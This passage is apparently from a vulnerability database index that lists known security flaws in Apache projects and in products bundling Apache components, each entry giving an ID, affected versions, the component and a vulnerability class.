| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
| [90263] Apache Archiva Header denial of service
| [90262] Apache Archiva Deserialize privilege escalation
| [90261] Apache Archiva XML DTD Connection privilege escalation
| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
| [87765] Apache James Server 2.3.2 Command privilege escalation
| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
5547| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
5548| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
5549| [82076] Apache Ranger up to 0.5.1 privilege escalation
5550| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
5551| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
5552| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
5553| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
5554| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
5555| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
5556| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
5557| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
5558| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
5559| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
5560| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
5561| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
5562| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
5563| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
5564| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
5565| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
5566| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
5567| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
5568| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
5569| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
5570| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
5571| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
5572| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
5573| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
5574| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
5575| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
5576| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
5577| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
5578| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
5579| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
5580| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
5581| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
5582| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
5583| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
5584| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
5585| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
5586| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
5587| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
5588| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
5589| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
5590| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
5591| [79791] Cisco Products Apache Commons Collections Library privilege escalation
5592| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
5593| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
5594| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
5595| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
5596| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
5597| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
5598| [78989] Apache Ambari up to 2.1.1 Open Redirect
5599| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
5600| [78987] Apache Ambari up to 2.0.x cross site scripting
5601| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
5602| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
5603| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
5604| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5605| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5606| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5607| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5608| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5609| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
5610| [77406] Apache Flex BlazeDS AMF Message XML External Entity
5611| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
5612| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
5613| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
5614| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
5615| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
5616| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
5617| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
5618| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
5619| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
5620| [76567] Apache Struts 2.3.20 unknown vulnerability
5621| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
5622| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
5623| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
5624| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
5625| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
5626| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
5627| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
5628| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
5629| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
5630| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
5631| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
5632| [74793] Apache Tomcat File Upload denial of service
5633| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
5634| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
5635| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
5636| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
5637| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
5638| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
5639| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
5640| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
5641| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
5642| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
5643| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
5644| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
5645| [74468] Apache Batik up to 1.6 denial of service
5646| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
5647| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
5648| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
5649| [74174] Apache WSS4J up to 2.0.0 privilege escalation
5650| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
5651| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
5652| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
5653| [73731] Apache XML Security unknown vulnerability
5654| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
5655| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
5656| [73593] Apache Traffic Server up to 5.1.0 denial of service
5657| [73511] Apache POI up to 3.10 Deadlock denial of service
5658| [73510] Apache Solr up to 4.3.0 cross site scripting
5659| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
5660| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
5661| [73173] Apache CloudStack Stack-Based unknown vulnerability
5662| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
5663| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
5664| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
5665| [72890] Apache Qpid 0.30 unknown vulnerability
5666| [72887] Apache Hive 0.13.0 File Permission privilege escalation
5667| [72878] Apache Cordova 3.5.0 cross site request forgery
5668| [72877] Apache Cordova 3.5.0 cross site request forgery
5669| [72876] Apache Cordova 3.5.0 cross site request forgery
5670| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
5671| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
5672| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
5673| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
5674| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
5675| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
5676| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
5677| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
5678| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
5679| [71629] Apache Axis2/C spoofing
5680| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
5681| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
5682| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
5683| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
5684| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
5685| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
5686| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
5687| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
5688| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
5689| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
5690| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
5691| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
5692| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
5693| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
5694| [70809] Apache POI up to 3.11 Crash denial of service
5695| [70808] Apache POI up to 3.10 unknown vulnerability
5696| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
5697| [70749] Apache Axis up to 1.4 getCN spoofing
5698| [70701] Apache Traffic Server up to 3.3.5 denial of service
5699| [70700] Apache OFBiz up to 12.04.03 cross site scripting
5700| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
5701| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
5702| [70661] Apache Subversion up to 1.6.17 denial of service
5703| [70660] Apache Subversion up to 1.6.17 spoofing
5704| [70659] Apache Subversion up to 1.6.17 spoofing
5705| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
5706| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
5707| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
5708| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
5709| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
5710| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
5711| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
5712| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
5713| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
5714| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
5715| [69846] Apache HBase up to 0.94.8 information disclosure
5716| [69783] Apache CouchDB up to 1.2.0 memory corruption
5717| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
5718| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
5719| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
5720| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
5721| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
5722| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
5723| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
5724| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
5725| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
5726| [69431] Apache Archiva up to 1.3.6 cross site scripting
5727| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
5728| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
5729| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
5730| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
5731| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
5732| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
5733| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
5734| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
5735| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
5736| [66739] Apache Camel up to 2.12.2 unknown vulnerability
5737| [66738] Apache Camel up to 2.12.2 unknown vulnerability
5738| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
5739| [66695] Apache CouchDB up to 1.2.0 cross site scripting
5740| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
5741| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
5742| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
5743| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
5744| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
5745| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
5746| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
5747| [66356] Apache Wicket up to 6.8.0 information disclosure
5748| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
5749| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
5750| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
5751| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
5752| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
5753| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
5754| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
5755| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
5756| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
5757| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
5758| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
5759| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
5760| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
5761| [65668] Apache Solr 4.0.0 Updater denial of service
5762| [65665] Apache Solr up to 4.3.0 denial of service
5763| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
5764| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
5765| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
5766| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
5767| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
5768| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
5769| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
5770| [65410] Apache Struts 2.3.15.3 cross site scripting
5771| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
5772| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
5773| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
5774| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
5775| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
5776| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
5777| [65340] Apache Shindig 2.5.0 information disclosure
5778| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
5779| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
5780| [10826] Apache Struts 2 File privilege escalation
5781| [65204] Apache Camel up to 2.10.1 unknown vulnerability
5782| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
5783| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
5784| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
5785| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
5786| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
5787| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
5788| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
5789| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
5790| [64722] Apache XML Security for C++ Heap-based memory corruption
5791| [64719] Apache XML Security for C++ Heap-based memory corruption
5792| [64718] Apache XML Security for C++ verify denial of service
5793| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
5794| [64716] Apache XML Security for C++ spoofing
5795| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
5796| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
5797| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
5798| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
5799| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
5800| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
5801| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
5802| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
5803| [64485] Apache Struts up to 2.2.3.0 privilege escalation
5804| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
5805| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
5806| [64467] Apache Geronimo 3.0 memory corruption
5807| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
5808| [64457] Apache Struts up to 2.2.3.0 cross site scripting
5809| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
5810| [9184] Apache Qpid up to 0.20 SSL misconfiguration
5811| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
5812| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
5813| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
5814| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
5815| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
5816| [8873] Apache Struts 2.3.14 privilege escalation
5817| [8872] Apache Struts 2.3.14 privilege escalation
5818| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
5819| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
5820| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
5821| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
5822| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
5823| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
5824| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
5825| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
5826| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
5827| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
5828| [64006] Apache ActiveMQ up to 5.7.0 denial of service
5829| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
